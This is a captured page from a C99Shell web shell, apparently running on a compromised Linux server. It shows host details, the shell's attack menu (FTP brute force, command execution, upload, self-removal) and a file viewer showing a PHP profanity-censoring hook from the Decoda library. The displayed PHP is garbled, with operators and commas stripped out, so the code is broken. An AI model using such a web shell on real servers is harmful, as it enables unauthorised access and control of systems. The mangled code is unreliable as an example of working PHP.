!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1. PHP/7.4.29 

uname -a: Linux vps-2738122-x 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 

uid=1(daemon) gid=1(daemon) grupos=1(daemon) 

Safe-mode: OFF (not secure)

/opt/apex_led/php/vendor/mjohnson/decoda/src/Decoda/Hook/   drwxrwxr-x
Free 15.59 GB of 61.93 GB (25.17%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     CensorHook.php (3.76 KB)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * @copyright   2006-2014, Miles Johnson - http://milesj.me
 * @license     https://github.com/milesj/decoda/blob/master/license.md
 * @link        http://milesj.me/code/php/decoda
 */

namespace Decoda\Hook;

use 
Decoda\Decoda;
use 
Decoda\Loader\FileLoader;

/**
 * Censors words found within the censored.txt blacklist.
 */
class CensorHook extends AbstractHook {

    
/**
     * List of words to censor.
     *
     * @type array
     */
    
protected $_blacklist = array();

    
/**
     * Configuration.
     *
     * @type array
     */
    
protected $_config = array(
        
'suffix' => array('ing''in''er''r''ed''d')
    );

    
/**
     * Read the contents of the loaders into the emoticons list.
     */
    
public function startup() {
        if (
$this->_blacklist) {
            return;
        }

        
// Load files from config paths
        
foreach ($this->getParser()->getPaths() as $path) {
            foreach (
glob($path 'censored.*') as $file) {
                
$this->addLoader(new FileLoader($file));
            }
        }

        
// Load the contents into the blacklist
        
foreach ($this->getLoaders() as $loader) {
            
$loader->setParser($this->getParser());

            if (
$blacklist $loader->load()) {
                
$this->blacklist($blacklist);
            }
        }
    }

    
/**
     * Parse the content by censoring blacklisted words.
     *
     * @param string $content
     * @return string
     */
    
public function beforeParse($content) {
        return 
$this->_censor($content);
    }

    
/**
     * Parse the content by censoring blacklisted words.
     *
     * @param string $content
     * @return string
     */
    
public function beforeStrip($content) {
        return 
$this->_censor($content);
    }

    
/**
     * Add words to the blacklist.
     *
     * @param array $words
     * @return \Decoda\Hook\CensorHook
     */
    
public function blacklist(array $words) {
        
$this->_blacklist array_map('trim'array_filter($words)) + $this->_blacklist;
        
$this->_blacklist array_unique($this->_blacklist);

        return 
$this;
    }

    
/**
     * Return the current blacklist.
     *
     * @return array
     */
    
public function getBlacklist() {
        return 
$this->_blacklist;
    }

    
/**
     * Trigger censoring.
     *
     * @param string $content
     * @return string
     */
    
protected function _censor($content) {
        
$pattern implode('|'array_map(array($this'_prepareRegex'), $this->getBlacklist()));
        
$content preg_replace_callback('/(?:^|\b)(?:' $pattern ')(?:\b|$)/is', array($this'_censorCallback'), $content);

        return 
$content;
    }

    
/**
     * Censor a word if its only by itself.
     *
     * @param array $matches
     * @return string
     */
    
protected function _censorCallback($matches) {
        
$length mb_strlen(trim($matches[0]));
        
$censored '';
        
$symbols str_shuffle('*@#$*!?%');
        
$i 0;
        
$s 0;

        if (
$length 10) {
            
$length 10;
        }

        while (
$i $length) {
            
$censored .= $symbols[$s];

            
$i++;
            
$s++;

            if (
$s 7) {
                
$s 0;
            }
        }

        return 
$censored;
    }

    
/**
     * Prepare the regex pattern for each word.
     *
     * @param string $word
     * @return string
     */
    
protected function _prepareRegex($word) {
        
$letters str_split($word);
        
$regex '';

        foreach (
$letters as $letter) {
            
$regex .= preg_quote($letter'/') . '+';
        }

        
$suffix $this->getConfig('suffix');

        if (
is_array($suffix)) {
            
$suffix implode('|'$suffix);
        }

        
$regex .= '(?:' $suffix ')?';

        return 
$regex;
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.3313 ]--